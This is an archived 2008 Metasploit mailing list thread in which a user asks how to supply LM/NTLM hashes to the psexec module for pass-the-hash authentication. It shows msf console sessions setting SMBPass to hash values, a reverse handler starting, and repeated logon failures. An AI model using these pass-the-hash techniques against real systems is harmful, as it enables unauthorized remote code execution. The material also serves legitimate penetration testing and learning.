Metasploit mailing list archives
Using LM and NTLM Hashes with Metasploit's psexec
From: mathewbrown at fastmail.fm (Mathew Brown)
Date: Fri, 11 Apr 2008 20:21:56 -0700
Hi HD,

Thank you for your reply, but I can't seem to get it to work. Also, where would I get the NTLM response from? I currently have the LM and NTLM hashes, not responses. I tried setting it to the LM:NTLM hash but it failed. I then tried it with just the NTLM hash and it also failed. Finally, I tried it in the :NTLM: format and it failed. Here's an example of what it tells me (the hash isn't really important since it's a test machine):

msf exploit(psexec) > set SMBPass ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
SMBPass => ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
SMBPass => b9d2d4957b330b503cc792eb6a55bb1
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, how would psexec differentiate between you sending it an NTLM hash to use for authentication and you sending it a password? In the example above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f? How would psexec know that this was an NTLM hash and not a password?

Any ideas? Thanks for your help.

PS. I'm currently running Metasploit v3.1.
After the failed attempts above, I verified that psexec works fine when I provide it with the real password and not the LM or NTLM hashes.
On Friday 11 April 2008, H D Moore wrote:
> I think you can just set SMBPass to the NTLM response and call it done
> (thanks grutz!).
>
> -HD
>
> On Friday 11 April 2008, Mathew Brown wrote:
>> Hi,
>>
>> After running info windows/smb/psexec in metasploit, it tells me:
>> "This module uses a valid administrator username and password (or
>> password hash) to execute an arbitrary payload."
>>
>> I currently have the LM and NTLM hashes for a valid account on a remote
>> machine but not the actual password. How would I pass this information
>> to the SMBPass variable. Should I just put it as LM:HASH?
>>
>> Thanks.
>>
>> --
>> Mathew Brown
>> mathewbrown at fastmail.fm

--
Mathew Brown
mathewbrown at fastmail.fm

--
http://www.fastmail.fm - The professional email service
Current thread:
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec H D Moore (Apr 11)
- <Possible follow-ups>
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 11)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
- Using LM and NTLM Hashes with Metasploit's psexec Mathew Brown (Apr 13)
- Using LM and NTLM Hashes with Metasploit's psexec Kurt Grutzmacher (Apr 12)
